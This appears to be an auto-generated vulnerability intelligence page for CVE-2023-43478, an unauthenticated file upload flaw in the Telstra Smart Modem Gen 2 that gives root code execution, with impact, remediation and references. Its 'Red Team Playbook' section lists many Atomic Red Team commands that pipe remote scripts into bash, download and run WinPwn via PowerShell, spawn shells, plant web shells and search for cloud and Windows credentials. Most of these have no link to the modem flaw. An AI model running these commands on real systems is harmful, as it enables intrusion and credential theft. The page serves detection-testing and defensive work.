CVE-2023-43478
Overview
This vulnerability is an unrestricted file upload issue in the Telstra Smart Modem Gen 2 (Arcadyan LH1000) firmware prior to version 0.18.15r. The root cause lies in the fake_upload.cgi endpoint, which fails to enforce authentication or validate uploaded file contents. This allows unauthorized users to upload arbitrary firmware images or configuration backups directly to the device.
Vulnerability Description
fake_upload.cgi on the Telstra Smart Modem Gen 2 (Arcadyan LH1000), firmware versions < 0.18.15r, allows unauthenticated attackers to upload firmware images and configuration backups, which could allow them to alter the firmware or the configuration on the device, ultimately leading to code execution as root.
Impact
An unauthenticated attacker with network access to the device can exploit this vulnerability to upload arbitrary firmware or configuration files, resulting in full root-level code execution. This can lead to complete device compromise, persistent backdoors, or disruption of device functionality. The attack requires no user interaction and no prior credentials, as indicated by CVSS vector AV:A/AC:L/PR:N/UI:N, allowing remote exploitation with high impact on confidentiality, integrity, and availability.
Solution
Users should upgrade the Telstra Smart Modem Gen 2 (Arcadyan LH1000) firmware to version 0.18.15r or later, as specified in the Tenable advisory TRA-2023-19 (https://www.tenable.com/security/research/tra-2023-19). This update addresses the authentication bypass in fake_upload.cgi and enforces proper validation on firmware and configuration uploads. Follow the vendor instructions in the advisory for secure firmware upgrade procedures.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with the Telstra Smart Modem Gen 2, specifically within the fake_upload.cgi component, presents a critical security flaw that allows unauthenticated attackers to upload arbitrary firmware images and configuration backups. This flaw is particularly concerning as it affects firmware versions prior to 0.18.15r. The root of the issue lies in the improper validation of user inputs and the lack of authentication mechanisms, which enables malicious actors to exploit the device without any prior authentication. By leveraging this vulnerability, attackers can manipulate the firmware or device configurations, potentially leading to unauthorized code execution with root privileges.
Exploitation of this vulnerability can occur through several attack vectors. An attacker could craft a malicious firmware image and send it to the device using the vulnerable CGI script. Since the device does not require authentication, this action can be performed remotely, making it particularly dangerous. Scenarios could include an attacker gaining control over a network by altering the modem's configuration to redirect traffic, intercept communications, or even deploy additional malware within the network. Furthermore, the ability to execute code as root means that an attacker could install persistent backdoors, enabling continued access to the device and the network it serves.
The real-world impact of this vulnerability is significant, especially for businesses that rely on the Telstra Smart Modem Gen 2 for their networking needs. Compromised devices could lead to data breaches, unauthorized access to sensitive information, and disruption of services. The potential for attackers to manipulate network traffic poses a severe risk, particularly for organizations handling confidential data or operating in regulated industries. The financial implications of such breaches can be substantial, ranging from direct costs associated with remediation efforts to reputational damage that can affect customer trust and loyalty.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Regularly updating firmware to the latest versions is crucial, as manufacturers often release patches to address known vulnerabilities. Additionally, network monitoring tools can help identify unusual traffic patterns or unauthorized access attempts. Employing strong network segmentation can limit the potential impact of a compromised device by isolating critical systems from less secure environments. Furthermore, organizations should consider implementing intrusion detection systems (IDS) to alert administrators of any suspicious activity related to the modem or the network it serves.
In conclusion, the vulnerability present in the Telstra Smart Modem Gen 2 represents a significant threat to both individual users and organizations. The ability for unauthenticated attackers to upload malicious firmware and execute code as root can lead to severe consequences, including data breaches and network manipulation. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves to detect and mitigate such vulnerabilities, ultimately enhancing their overall cybersecurity posture.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Telstra | Arcadyan Lh1000 Firmware | All |
cpe:2.3:o:telstra:arcadyan_lh1000_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
30%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-43478 |
| tenable.com |
GitHub CVE
|
https://www.tenable.com/security/research/tra-2023-19 |